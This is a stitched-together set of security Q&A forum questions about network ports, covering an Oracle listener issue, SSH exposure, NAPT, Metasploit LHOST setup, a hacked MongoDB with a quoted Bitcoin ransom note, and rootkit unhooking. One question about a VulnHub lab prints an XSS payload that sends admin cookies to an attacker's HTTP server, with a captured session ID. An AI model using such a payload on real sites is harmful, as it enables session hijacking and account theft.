Oracle 19c express manager not loading, listener will not register https port after exec dbms_xdb_config.gethttpsport()

We just set up a new oracle 19c install on a VM Windows Server 2020. I have been struggling trying to get the Express Manager working. At the end of the installation Oracle notified me that I can access the Express Manager at https://%localhost%:5500/em But upon visiting the website in chrome the connection is refused. I disabled the firewall and receive the same message. I went through the oracle documentation and ensured that dbms_xdb_config.gethttpsport() outputs 5500.

After running lsnrctl status I noticed that under listeners I am missing port 5500. I searched other users with the same issue they all have an entry for port 5500 like the following.

(DESCRIPTION=(ADDRESS=(PROTOCOL=tcps)(HOST=HOSTNAME.domain)(PORT=5500))(Security=(my_wallet_directory=C:\ORACLE\admin\ecoomdb\xdb_wallet))(Presentation=HTTP)(Session=RAW))     Services Summary...  

According to Oracle documentation when I run the command dbms_xdb_config.gethttpsport(5500) the listener should register the port. But after running the command muliple times this is not happening.

XSS on port other than 80 not working

I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.

The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers

<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>

And I get the cookie like this

192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -

But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger

<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>

Or at least I don’t see anything.

Please note that the boot2root VM seems to call every minute without fail.

I don’t know why this is happening. Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.

Do I need port forwarding for msfconsole remote target exploitation

I was running a series of test attacks on my virtual test machine. Here i had to set the RHOST option to the Ip-address of the target and LHOST to the Ip-address of my local machine. I am certain that this works well locally because both machines would be on the same private network, with private ip addresse. But what if i had my linux machine(not vm) connected to my phone which is serving as a router. If i ran such an attack on a machine on the internet, RHOST would be the public Ip-address of the target machine; i am skeptical as to what ip address i would put for my LHOST option; can i just use my private ip address(given to my linux from my phone hotspot) as this option or do i have to type in the public ip-address for my phone. And if i do have to put in my phone’s public IP is port forwarding needed in such a case or it would work just fine?

Mongo DB hacked (read_me_to_recover) without the port exposed in the firewall?

I Have recently setup parse-server on a DO vps, using 3 docker containers, one for parse-server, one for parse-server dashboard and one for mongodb. Because I am just testing this setup I left the mongo container as it is (mongodb://mongo:27017/dev). I have NGINX (not in docker) running as a reverse proxy (to get SSL), it forwards port 80 and 443 to http://127.0.0.1:4040 internal (the parse dashboard web gui). and it routes 1338 to http://127.0.0.1:1337 the parse server (API) itself. This parse server connects to my mongo DB internally.

This is the first time I am using Docker and mongoDB, because of this setup and the mongo db port not open I thought it would be half-decently safe. My question is, how did the hacker breach my database? There was nothing of value stored but there might be in the future. I don’t think he exploited my parse server because I could see the connection coming from a cpython client (the parse connection showed as nodeJS client.

I have added: NGINX, FIREWALL,Docker processes, Mongo LOG lines

nginx terminal

{"t":{"$  date":"2020-08-13T12:23:14.165+00:00"},"s":"I",  "c":"NETWORK",  "id":22943,   "ctx":"listener","msg":"connection accepted","attr":{"remote":"46.182.106.190:39672","sessionId":31,"connectionCount":3}} {"t":{"$  date":"2020-08-13T12:23:14.359+00:00"},"s":"I",  "c":"NETWORK",  "id":51800,   "ctx":"conn31","msg":"client metadata","attr":{"remote":"46.182.106.190:39672","client":"conn31","doc":{"driver":{"name":"PyMong                      o","version":"3.10.1"},"os":{"type":"Linux","name":"Linux","architecture":"x86_64","version":"4.15.0-112-generic"},"platform":"CPython 3.6.9.final.0"}}} {"t":{"$  date":"2020-08-13T12:23:15.941+00:00"},"s":"I",  "c":"COMMAND",  "id":20337,   "ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"READ_ME_TO_RECOVER_YOUR_DATA"}} 
> db.README.find(); { "_id" : ObjectId("5f3536cd2a546e2eea8211eb"), "content" : "All your data is a backed up. You must pay 0.015 BTC to 145Nny3Gi6nWVBz45Gv9SqxFaj                                                                                              uwTb2qTw 48 hours for recover it. After 48 hours expiration we will leaked and exposed all your data. In case of refusal to pay, we will contac                                                                                              t the General Data Protection Regulation, GDPR and notify them that you store user data in an open form and is not safe. Under the rules of the                                                                                               law, you face a heavy fine or arrest and your base dump will be dropped from our server! You can buy bitcoin here, does not take much time to                                                                                               buy https://localbitcoins.com with this guide https://localbitcoins.com/guides/how-to-buy-bitcoins After paying write to me in the mail with yo                                                                                              ur DB IP: restore_base@tuta.io" } 

Is it safe to expose port 22 on a database VM?

I have seen many answers to this question in different scenarios but I am still unsure of the actual answer.

I have a VM in the cloud (Azure), which will be hosting my production database. Is it safe to have port 22 open for my SSH connection? it also has a public IP address, is this safe too?

This is my first time having to concern myself with these types of questions so apologies for the lack of understanding.

Is IP masquerade and Network Address Port Translation(NAPT) the same?

Is IP masquerade and Network Address Port Translation(NAPT) the same? I’m not sure whether it is the same thing or not but I realized the mechanism is almost the same where both IP masquerade and NAPT changes TCP/UDP port and many-to-one relation is allowed:multiple private addresses share one global IP address. If it is different which part is IP masquerade and NAPT is different?

Is starting an AWS instance with only ssh to port 22 insecure?

Unless someone has my private ssh key, how is leaving an aws instance open to 0.0.0.0 but only on port 22 via ssh insecure?

enter image description here

The ssh key would be distributed to a small set of people. I prefer to not need to indicate their source IP addresses in advance.

I do see another similar question SSH brute force entry in aws ec2 instance .

If you disabled password based login via SSH, then it is very hard to brute force an SSH login using a private key (

Maybe this covers it? Just want to double check since in the security world you do not get a second chance.

Are port and miniport drivers protected by patchguard in windows?

I’m planning to write a Driver that unhooks the rootkit hooks in the miniport layer (hooks of device objects or major function array)

but i want my driver to be generic and work in most windows versions and both 32 and 64 bit windows

the problem is patchguard, so will patch guard block attempts to modify the memory image of the miniport drivers?

you might be asking how the rootkit patched it in the first place then, its a bootkit so it bypassed the patchguard protections but didn’t disable it.

and if it is protected by patch guard, then how can i unhook the hooks in the driver module?!